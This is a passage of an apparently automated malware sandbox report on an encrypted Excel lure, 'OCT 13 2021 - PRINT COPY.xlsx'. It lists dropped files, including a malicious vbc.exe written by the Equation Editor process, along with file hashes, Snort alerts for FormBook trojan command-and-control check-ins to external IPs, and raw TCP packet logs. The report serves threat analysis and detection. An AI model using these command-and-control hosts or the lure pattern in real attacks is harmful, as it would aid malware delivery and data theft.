Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77E6274F.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6413589843105386
Encrypted:	false
SSDEEP:	384:/LoXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:GXwBkNWZ3cjvmWa+VDO
MD5:	B8AAC3B92367FB8C6A752850628E3348
SHA1:	00D73FD238D33D014E29766FA00559A1F7252012
SHA-256:	4CF94780BEB56C978738EFFDCF5CC78C5309A09CA03F970BA72E60207051EC0E
SHA-512:	2E1DA188A704B6FC39205F5A659764CA6A533F5A0FE516692578382C766BD9F31E5C1C351A52BD289765287B9E791318B670A9C963684D50E9CDEF99AB6C32CA
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$........f.[.@..%...............<.......RQ.\<...4........... ...$Q.\<...4... ...Id.[4...<... .........<..d.[........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...4...h....8.[......<.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F71BD35.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\946B991E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1107904.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8C65A0B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2CECB51.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\Desktop\~$OCT 13 2021 - PRINT COPY.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	474112
Entropy (8bit):	7.47098319943845
Encrypted:	false
SSDEEP:	6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
MD5:	6429AA83E4BC083B4F0B3F44B0D7950F
SHA1:	0EAD59881F054284F611ACCB61451ED1FFC818FC
SHA-256:	96C57AE661562E958E01BB0B490C09A0A51BB367931620223174963DE88BDFCB
SHA-512:	186383701C591DB2C011C8AE24920759C10880068DD217E32110AE54B9C7F0863B7FB04E893F601A234742DEB5838A22820DC8835BA9198D66B7BB297D502F9B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............:..............@..B........................H.......Lb..pO......Y....................................................0..V.........}.......s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....\|....(....Z.{.....\|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....\|....(..........-....X.....\|....(..........-......,...o!.....sB........\|....(.....\|....(....s"

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.971800751750221
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	OCT 13 2021 - PRINT COPY.xlsx
File size:	356184
MD5:	5c546d999e38e6e51a6c1675b3a646f3
SHA1:	39ce280bc35b7cc313cbaed2476ee300d7e928c3
SHA256:	980e889b97c92e9a81ff548a481978ad5c2b42829ddb6014d3720c19772e3799
SHA512:	b39324fbc8cab5820566be872396b35a3aaaa44407b46632a46b255345dbed675f04c4f17ff9beb7ae046583b01498cb11b8115f8acbd92836825dff4385f7b4
SSDEEP:	6144:Fr9OhqdApoBlNfbc6LWgAKCSQJePpqu5janAIxTCIEPtUr2TsBPDVvhi8mrO:/2WlNZWrSDBqUjanjPEP+RrVk8t
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-20:17:25.557761	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	34.102.136.180	192.168.2.22
10/13/21-20:17:30.602564	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	34.102.136.180
10/13/21-20:17:30.602564	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	34.102.136.180
10/13/21-20:17:30.602564	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	34.102.136.180
10/13/21-20:17:30.718043	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49170	34.102.136.180	192.168.2.22
10/13/21-20:17:35.773064	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	172.67.213.229
10/13/21-20:17:35.773064	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	172.67.213.229
10/13/21-20:17:35.773064	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	172.67.213.229

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 20:15:52.815390110 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.834563971 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.834729910 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.835145950 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.855649948 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855690002 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855705023 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855823994 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855849028 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855875015 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855875015 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.855899096 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855927944 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855931997 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.855952024 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855957031 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.855977058 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.855986118 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.856014013 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.856021881 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.871397018 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.874900103 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.874941111 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.874963045 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.874983072 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.874999046 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875020981 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875042915 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875051975 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875065088 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875091076 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875138998 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875149965 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875158072 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875171900 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875176907 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875200033 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875214100 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875226021 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875237942 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875252962 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875264883 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875287056 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875303984 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875320911 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875336885 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875355005 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875381947 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.875381947 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.875472069 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.877235889 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.893819094 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893874884 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893897057 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893915892 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893939018 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893965006 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.893985987 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894009113 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894030094 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894056082 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894064903 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894074917 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894093037 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894097090 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894100904 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894112110 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894128084 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894140005 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894153118 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894162893 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894181967 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894206047 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894207001 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894229889 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894232988 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894241095 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894256115 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894267082 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894284010 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894294024 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894309044 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894318104 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894332886 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894344091 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894357920 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894367933 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894382954 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894392967 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894406080 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894427061 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894428968 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894439936 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894454002 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894463062 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894480944 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894488096 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894506931 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894520044 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894531012 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894552946 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894556046 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894563913 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894579887 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894589901 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894603968 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894613981 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894629955 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894650936 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894651890 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894678116 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.894710064 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.894714117 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.895560026 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.895644903 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.895679951 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.895713091 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.895723104 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.895740032 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.895750999 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.895765066 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.895776987 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.895802021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.897171021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.912975073 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913033962 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913057089 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913078070 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913098097 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913120031 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913137913 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913146019 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913167000 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913168907 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913172007 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913181067 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913197041 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913203955 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913223982 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913233995 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913248062 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.913259029 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.913270950 CEST	80	49165	18.197.254.181	192.168.2.22
